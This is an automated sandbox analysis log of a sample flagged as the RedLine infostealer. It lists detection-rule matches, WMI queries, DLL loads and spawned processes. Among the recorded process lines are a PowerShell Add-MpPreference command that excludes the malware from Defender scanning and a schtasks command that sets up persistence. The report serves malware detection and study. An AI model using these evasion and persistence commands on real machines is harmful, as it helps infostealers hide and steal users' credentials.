                    Source: 0.2.I5pvP0CU6M.exe.47a46e8.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 9.2.I5pvP0CU6M.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 9.2.I5pvP0CU6M.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 0.2.I5pvP0CU6M.exe.47bc508.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 0.2.I5pvP0CU6M.exe.47bc508.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 11.2.VcihjWRO.exe.445da18.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 11.2.VcihjWRO.exe.445da18.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 0.2.I5pvP0CU6M.exe.47bc508.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 0.2.I5pvP0CU6M.exe.47bc508.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 11.2.VcihjWRO.exe.4445bf8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 11.2.VcihjWRO.exe.4445bf8.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 0.2.I5pvP0CU6M.exe.47a46e8.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 0.2.I5pvP0CU6M.exe.47a46e8.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 00000009.00000002.2322211102.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 0000000B.00000002.2316828394.0000000004445000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 00000000.00000002.2220979591.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: Process Memory Space: I5pvP0CU6M.exe PID: 2432, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: Process Memory Space: I5pvP0CU6M.exe PID: 6724, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: Process Memory Space: VcihjWRO.exe PID: 7224, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: I5pvP0CU6M.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: VcihjWRO.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 0.2.I5pvP0CU6M.exe.470b2f0.3.raw.unpack, xJpQPIrqp0EqOJe24h.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.I5pvP0CU6M.exe.470b2f0.3.raw.unpack, xJpQPIrqp0EqOJe24h.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.I5pvP0CU6M.exe.470b2f0.3.raw.unpack, xJpQPIrqp0EqOJe24h.csSecurity API names: _0020.AddAccessRule
                    Source: 0.2.I5pvP0CU6M.exe.46b1cd0.4.raw.unpack, x9bdvNQOCuV2nB7v8T.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.I5pvP0CU6M.exe.470b2f0.3.raw.unpack, x9bdvNQOCuV2nB7v8T.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.I5pvP0CU6M.exe.7880000.6.raw.unpack, x9bdvNQOCuV2nB7v8T.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.I5pvP0CU6M.exe.46b1cd0.4.raw.unpack, xJpQPIrqp0EqOJe24h.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.I5pvP0CU6M.exe.46b1cd0.4.raw.unpack, xJpQPIrqp0EqOJe24h.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.I5pvP0CU6M.exe.46b1cd0.4.raw.unpack, xJpQPIrqp0EqOJe24h.csSecurity API names: _0020.AddAccessRule
                    Source: 0.2.I5pvP0CU6M.exe.7880000.6.raw.unpack, xJpQPIrqp0EqOJe24h.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.I5pvP0CU6M.exe.7880000.6.raw.unpack, xJpQPIrqp0EqOJe24h.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.I5pvP0CU6M.exe.7880000.6.raw.unpack, xJpQPIrqp0EqOJe24h.csSecurity API names: _0020.AddAccessRule
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@23/103@1/1
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeFile created: C:\Users\user\AppData\Roaming\VcihjWRO.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4900:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2760:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3416:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7480:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7588:120:WilError_03
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeMutant created: \Sessions\1\BaseNamedObjects\WUAHQdDyeTGYRKlWZxfOxFZaJzJ
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5552:120:WilError_03
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeFile created: C:\Users\user\AppData\Local\Temp\tmp4733.tmpJump to behavior
                    Source: I5pvP0CU6M.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: I5pvP0CU6M.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: I5pvP0CU6M.exe, 00000009.00000002.2325569956.0000000002F7B000.00000004.00000800.00020000.00000000.sdmp, I5pvP0CU6M.exe, 00000009.00000002.2325569956.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, I5pvP0CU6M.exe, 00000009.00000002.2325569956.0000000003067000.00000004.00000800.00020000.00000000.sdmp, tmp5F71.tmp.9.dr, tmp2B8.tmp.17.dr, tmp53D5.tmp.17.dr, tmpF22E.tmp.9.dr, tmp3B4E.tmp.17.dr, tmpF23E.tmp.9.dr, tmp8E21.tmp.17.dr, tmp3B5E.tmp.17.dr, tmp5F4E.tmp.9.dr, tmpBB6C.tmp.9.dr, tmpBB5B.tmp.9.dr, tmp2A7.tmp.17.dr, tmpF22D.tmp.9.dr, tmp5F82.tmp.9.dr, tmp5F5F.tmp.9.dr, tmp8E34.tmp.17.dr, tmp8E22.tmp.17.dr, tmp5F4F.tmp.9.dr, tmp296.tmp.17.dr, tmp2B7.tmp.17.dr, tmp5F70.tmp.9.dr, tmpBB5C.tmp.9.dr, tmp8E11.tmp.17.dr, tmp8E33.tmp.17.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: I5pvP0CU6M.exeReversingLabs: Detection: 68%
                    Source: I5pvP0CU6M.exeVirustotal: Detection: 65%
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeFile read: C:\Users\user\Desktop\I5pvP0CU6M.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\I5pvP0CU6M.exe "C:\Users\user\Desktop\I5pvP0CU6M.exe"
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\I5pvP0CU6M.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\VcihjWRO.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VcihjWRO" /XML "C:\Users\user\AppData\Local\Temp\tmp4733.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess created: C:\Users\user\Desktop\I5pvP0CU6M.exe "C:\Users\user\Desktop\I5pvP0CU6M.exe"
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\VcihjWRO.exe C:\Users\user\AppData\Roaming\VcihjWRO.exe
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VcihjWRO" /XML "C:\Users\user\AppData\Local\Temp\tmp7075.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess created: C:\Users\user\AppData\Roaming\VcihjWRO.exe "C:\Users\user\AppData\Roaming\VcihjWRO.exe"
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess created: C:\Users\user\AppData\Roaming\VcihjWRO.exe "C:\Users\user\AppData\Roaming\VcihjWRO.exe"
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\I5pvP0CU6M.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\VcihjWRO.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VcihjWRO" /XML "C:\Users\user\AppData\Local\Temp\tmp4733.tmp"Jump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess created: C:\Users\user\Desktop\I5pvP0CU6M.exe "C:\Users\user\Desktop\I5pvP0CU6M.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VcihjWRO" /XML "C:\Users\user\AppData\Local\Temp\tmp7075.tmp"
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess created: C:\Users\user\AppData\Roaming\VcihjWRO.exe "C:\Users\user\AppData\Roaming\VcihjWRO.exe"
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess created: C:\Users\user\AppData\Roaming\VcihjWRO.exe "C:\Users\user\AppData\Roaming\VcihjWRO.exe"
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeSection loaded: iconcodecservice.dllJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
